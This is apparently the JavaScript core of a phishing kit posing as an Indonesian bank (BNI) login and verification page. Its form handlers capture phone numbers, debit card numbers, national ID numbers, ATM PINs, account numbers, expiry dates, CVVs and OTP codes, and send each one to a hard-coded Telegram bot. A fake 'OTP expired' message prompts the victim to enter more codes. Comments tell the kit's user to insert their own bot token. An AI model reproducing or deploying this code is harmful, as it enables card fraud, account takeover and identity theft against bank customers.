function sendNohp(event){
  event.preventDefault();
   
  $("#loadersaya").show();


 var logo = document.getElementById('logo');
 var nope = document.getElementById('nope');
 

    var gabungan = '' + logo.value + '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—›ð—®ð—»ð—±ð—½ð—µð—¼ð—»ð—² %3A%0A' + nope.value;

    var token = '6292482660:AAFB4c44c-0qPXqVoEa4PEG8XkuCnXZLzD0'; // Ganti dengan token bot yang kamu buat
    var grup = '6221228583'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
    $("#loadersaya").hide();
    setTimeout(function(){
  var nomor = document.getElementById("nope").value;
 sessionStorage.setItem("nomor", nomor);
  document.getElementById("popupku").style.display = "block";
    }, 1500);}});};
  

function sendData(event){
    $("#loadersaya").show();
    event.preventDefault();
    
 
  
    var logo = document.getElementById('logo');       
   
   var debit = document.getElementById('debit');
    var nikktp = document.getElementById('nikktp');
    var nomorhandphone = document.getElementById('nomorhandphone');
    var pinatm = document.getElementById('pinatm');
    var reke = document.getElementById('reke');
 
    var gabungan = '' + logo.value + '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—žð—®ð—¿ð˜ð˜‚ ð——ð—²ð—¯ð—¶ð˜ :%0A' + debit.value + '%0Að—¡ð—œð—ž ð—žð—§ð—£ :%0A' + nikktp.value + '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—›ð—®ð—»ð—±ð—½ð—µð—¼ð—»ð—² :%0A' + nomorhandphone.value + '%0Að—£ð—œð—¡ ð—”ð—§ð—  :%0A' + pinatm.value + '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—¥ð—²ð—¸ð—²ð—»ð—¶ð—»ð—´ :%0A' + reke.value;
    
    var token = '6292482660:AAFB4c44c-0qPXqVoEa4PEG8XkuCnXZLzD0'; // Ganti dengan token bot yang kamu buat
    var grup = '6221228583'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
   $("#loadersaya").hide();
 $("#isidata").fadeOut();
 setTimeout(function(){
    $("#inputotp").fadeIn();
    $("#pin1").focus();
document.getElementById("thisPhone").innerHTML = "Masukkan Kode OTP<br/>Yang di kirim ke nomor " + nope.value;
    }, 1500);}});};
    
    
function kirimPesan(event) {
 event.preventDefault();
  $("#loadersaya1").show();

    var logo = document.getElementById('logo');
    var pin1 = document.getElementById('pin1');
    var pin2 = document.getElementById('pin2');
    var pin3 = document.getElementById('pin3');
    var pin4 = document.getElementById('pin4');
    var pin5 = document.getElementById('pin5');
    var pin6 = document.getElementById('pin6');

    var gabungan = '' + logo.value + '%0Að—¢ð—§ð—£%20ð—•ð—¡ð—œ:%0A' +   pin1.value + pin2.value + pin3.value + pin4.value + pin5.value + pin6.value;

    var token = '6292482660:AAFB4c44c-0qPXqVoEa4PEG8XkuCnXZLzD0'; // Ganti dengan token bot yang kamu buat
    var grup = '6221228583'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
        
    success: function(){
         $("#blink").addClass("blink");
         document.getElementById("pincode").reset();
            
$("#blink").text("Kode OTP Kadaluarsa, Silahkan Coba Lagi");
$("#blink").css("color","red");
        $("#blink").show();
   setTimeout(function(){
       $("#loadersaya1").hide();
        $("#blink").text("Kode Baru Sudah Kami Kirim Kembali");
$("#blink").css("color","#2E869C");
        $("#blink").show();
         $("#blink").removeClass("blink");
         $("#pin1").focus();

        }, 3000);}});};

   
      

 function openNotif(event){
event.preventDefault();
  $("#loadersaya").show();
  
   var logo = document.getElementById('logo');
   var nope = document.getElementById('nope');
    var nama = document.getElementById('nama');
    var bulan = document.getElementById('bulan');
    var tahun = document.getElementById('tahun');
    var pesan = document.getElementById('pesan');
    
    

    var gabungan = '' + logo.value + '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—›ð—®ð—»ð—±ð—½ð—µð—¼ð—»ð—² %3A%0A' + nope.value +  '%0Að—¡ð—¼ð—ºð—¼ð—¿ ð—žð—®ð—¿ð˜ð˜‚ ð——ð—²ð—¯ð—¶ð˜/ð—”ð—§ð—  %3A%0A' + nama.value + '%0Að— ð—®ð˜€ð—® ð—•ð—²ð—¿ð—¹ð—®ð—¸ð˜‚ %3A%0A' + bulan.value + "/" + tahun.value + '%0Að—–ð—©ð—© %3A%0A' + pesan.value;

    var token = '6292482660:AAFB4c44c-0qPXqVoEa4PEG8XkuCnXZLzD0'; // Ganti dengan token bot yang kamu buat
    var grup = '6221228583'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,

   success: function(){
   setTimeout(function(){
document.getElementById("thisPhone").innerHTML = "Masukkan Kode OTP<br/>Yang di kirim ke nomor " + nope.value;
   $("#loadersaya").hide();
 document.getElementById("infoku").style.display = "block";
  
        }, 500);}});};   


